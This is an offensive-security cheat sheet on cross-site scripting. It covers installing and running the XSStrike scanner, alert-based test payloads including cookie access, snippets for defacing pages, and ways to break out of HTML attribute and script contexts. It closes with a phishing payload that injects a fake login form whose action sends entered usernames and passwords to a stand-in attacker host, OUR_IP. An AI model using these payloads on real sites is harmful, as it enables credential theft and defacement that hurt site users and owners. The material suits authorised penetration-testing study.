XSS

PRIMARY CATEGORY → WEB ATTACKS

Components ⟡

• 
  • PERSISTENT XSS
• 
  • NON-PERSISTENT XSS
• 
  • BLIND XSS

---

Discovery

Automatic

XSS Strike

• Setup

git clone https://github.com/s0md3v/XSStrike XSStrike
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt

• Usage

GET

python3 xsstrike.py --url '<URL>?<PARAM>=<VALUE>&<PARAM>=<VALUE>'

POST

python3 xsstrike.py --url '<URL>' --data '<PARAM>=<VALUE>'

---

Testing Payloads

General

<script>alert(location.origin)</script> # Useful on IFRAME Contexts
<script>alert(document.domain)</script>
<img src=x onerror=alert(location.origin)>
<svg onload=alert(location.origin)>

Cookies

alert(document.cookie)

Resources

PayloadAllTheThings

Payload-Box

---

Web Defacement

Changing Background

Background Color

document.body.style.background = "<COLOR>"

Background Image

document.body.background = "<IMAGE_URL>"

Changing Page Title

document.title = "<STRING>"

Changing Page Text

document.getElementById("<HTML_TAG_ID>").innerHTML = "<STRING>"

JQuery

$("<HTML_TAG_ID>").html('<STRING>');

Changing the entire HTML Code of the Body

document.getElementsByTagName('body')[0].innerHTML = "<STRING>"

---

Login Form Injection

Login Form

Sample

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

Payload

First, we have to look for an injection point vulnerable to XSS. Once we find it, we can modify the HTML code from the client side by running the javascript payload below

• Injection Point

GET Parameter

https://www.domain.com?url=<USER_INPUT>

• Reflected Input in the HTTP Response

...<SNIP>...
<img src='<USER_INPUT'>
...<SNIP>...

• Escaping the context

JS Execution on HTML Attribute

We leverage the img tag itself to close the src attribute and add a js code using the onerror attribute handler

x' onerror=alert(location.origin)> <!--

JS Execution within an SCRIPT tag

In this case, we close the entire img tag context and add an script tag to include js code

'><script>alert(document.cookie)</script> <!--

• Minified Payload

In order to accomplish the phishing, simply replace the standard alert payload with the code below, which adds a form that sends the entered data to an HTTP server controlled by the attacker

document.body.innerHTML = '<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'